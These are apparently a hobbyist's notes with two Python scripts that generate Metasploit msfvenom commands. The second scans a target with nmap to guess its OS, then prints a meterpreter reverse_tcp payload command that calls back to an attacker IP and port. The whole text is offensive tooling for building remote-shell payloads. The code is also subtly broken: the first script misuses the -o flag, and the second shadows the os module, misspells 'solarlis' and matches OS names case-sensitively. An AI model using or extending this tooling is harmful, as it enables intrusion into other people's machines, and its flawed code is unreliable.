I DONT THINK THIS IS THE RIGHT ONE -----> THE SECOND ONE IS A BETTER ONE ...STARTS AT LINE 28
def msfvenomWrapper():
    # Get payload type
    payload_type = input("Please specify payload type (e.g. windows/meterpreter/bind_tcp): ")

    # Get target system
    target_system = input("Please specify target system (e.g. Windows, Linux): ")

    # Get target architecture
    target_arch = input("Please specify target architecture (e.g. x86, x64): ")

    # Get target IP
    target_ip = input("Please specify target IP: ")

    # Get target port
    target_port = input("Please specify target port: ")

    # Generate payload
    generated_payload = f'msfvenom -p {payload_type} -a {target_arch} -o {target_system} LHOST={target_ip} LPORT={target_port}'

    # Output payload
    print(generated_payload)

msfvenomWrapper()
------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------------------
THIS SHOULD BE A BETTER ONE....THIS ONE RAN PROPERLY IN VISUAL STUDIO
#!/usr/bin/python

import os
import subprocess

print("Welcome to the Reverse Shell Payload Generator")

# Get info from user
attackerIP = input("Please enter the IP of the attacker machine: ")
attackerPort = input("Please enter the port of the attacker machine: ")

# Enumerate target
targetIP = input("Please enter the IP of the target machine: ")
osInfo = str(subprocess.check_output(["nmap", "-O", targetIP]))
print(type(osInfo))
print(osInfo)

if osInfo.find("windows") != -1:
    #print("i found windows")
    os = "windows"
    print(os)
elif osInfo.find("linux") != -1:
    os = "linux"
    print(os)
elif osInfo.find("solarlis") !=-1:
    os = "solaris"
    print(os)

payload = "msfvenom -p "+os+"/meterpreter/reverse_tcp LHOST="+attackerIP+" LPORT="+attackerPort+" EXITFUNC=thread -f raw"      
print(payload)
